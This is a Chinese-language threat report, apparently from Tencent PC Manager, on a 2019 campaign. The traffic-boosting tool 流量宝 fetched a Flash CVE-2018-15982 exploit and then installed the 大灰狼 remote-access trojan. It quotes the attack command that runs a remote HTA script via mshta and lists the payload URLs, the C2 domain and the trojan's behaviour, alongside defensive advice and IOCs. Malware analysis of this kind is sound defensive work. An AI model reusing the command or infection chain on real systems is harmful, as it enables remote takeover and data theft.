利用最新flash漏洞通过“流量宝”对流量从业者的攻击活动

2019-01-09 来源:原创 作者:腾讯电脑管家
【文章摘要】1月8日,腾讯御见威胁情报中心再次监控到流量宝流量版故技重施,利用该软件内嵌的Flash最新漏洞进行网页挂马攻击,本次攻击已有3000-5000台电脑中招,腾讯电脑管家已全面拦截。受害者集中在使用刷量工具的人群,包括视频网站刷量、自媒体文章刷量、网店刷量、短视频刷热点等等领域。

一、背景

20186月腾讯御见威胁情报中心曾监控到刷量神器“流量宝流量版”,在运行时自动请求带有浏览器高危漏洞(编号:CVE-2018-8174)的攻击页面,并在漏洞攻击成功后植入DDoS木马、远程控制木马、挖矿木马等。2018年6月的攻击造成约10万台计算机中招,其中不乏使用流量宝流量版来刷量的自媒体、视频网站主播、电商刷量团伙。

18日,腾讯御见威胁情报中心再次监控到流量宝流量版故技重施,利用该软件内嵌的Flash组件进行网页挂马攻击,本次攻击已有3000-5000台电脑中招,腾讯电脑管家已全面拦截。受害者集中在使用刷量工具的人群,包括视频网站刷量、自媒体文章刷量、网店刷量、短视频刷热点等等领域。

攻击页面包含攻击者精心构造的Flash漏洞(CVE-2018-15982)攻击文件(apt.swf),该Flash文件在较低版本的Adobe Flash Player程序运行时会触发漏洞导致任意代码执行。漏洞攻击成功后会进一步植入大灰狼远程控制木马,致使中招用户电脑被完全控制,进而导致系统信息被搜集、重要资料泄露、电脑行为被监控,被植入任意木马等严重后果。


木马攻击流程

二、漏洞攻击

流量宝流量版.exe


在运行刷量过程中会自动请求页面bcaou.cn并下载Flash漏洞攻击文件apt.swf运行。


分析发现,apt.swf包含攻击者精心构造的Adobe Flash Player

最新漏洞(漏洞编号CVE-2018-15982)攻击代码,Adobe官方在20181205日公布了该漏洞及修复建议。该楼是flashcom.adobe.tvsdk.mediacore.metadata中的一个UAF漏洞,利用该漏洞攻击可导致任意代码执行,漏洞影响版本为Adobe Flash Player <= 31.0.0.153


漏洞攻击成功后会执行命令mshta http://bcaou.cn/a.hta

5


随后a.hta脚本利用powershell下载大灰狼远控木马hxxp://bcaou.cn/a.exe保存到c:\windows\temp\a.exe并拉起执行。


三、远控控制木马

漏洞攻击后执行的a.exe是大灰狼远控木马母体,启动后拷贝自身到目录C:\Program Files (x86)\Microsoft Whmfyw\Whmfywy.exe并执行。


通过CreateFileA判断远控木马DLL文件NetSyst.dll是否存在


不存在则下载hxxp://bcaou.cn/NetSyst.dll


验证获取到的DLL文件是否具有标记“2015-SV8”。



验证通过则通过内存加载PE执行远控木马主体。


木马上线后连接C2地址qll1.net


然后根据返回的命令执行多种远控功能:


木马具有:包括查看本机信息,查看本机注册表,查看本地硬盘,上传、下载文件,删除文件,清除系统记录,查看系统服务,运行程序,结束程序,及其3389远程桌面多用户登陆,记录键盘等一系列远程功能。远控功能详细分析可参考:https://mp.weixin.qq.com/s/IbB67BWbvgvKaV-Q1ZfbxA

四、安全建议

1、升级Adobe Flash Player到较高版本,具体可参考Adobe官方公告:

https://helpx.adobe.com/security/products/flash-player/apsb18-42.html

2、谨慎使用刷量类软件,该类软件在使用时会大量访问未经过审核检验的广告URL,导致可能访问到包含恶意代码的地址。

3、保持安全软件实时开启,拦截可能遭到的木马攻击。

IOCs

域名:

bcaou.cn

qll1.net


URL

hxxp:// bcaou.cn/apt.swf

hxxp://bcaou.cn/a.hta

hxxp://bcaou.cn/a.exe

hxxp://bcaou.cn/NetSyst.dll


md5

36e8fce77217b40026c643fa0ff37f14

daf385091f17796b59a6ea1145846dda

8c19d83ff359a1b77cb06939c2e5f0cb

电脑管家纯净版

企鹅守护全新上线

详情>>

版本更新:2018.11.12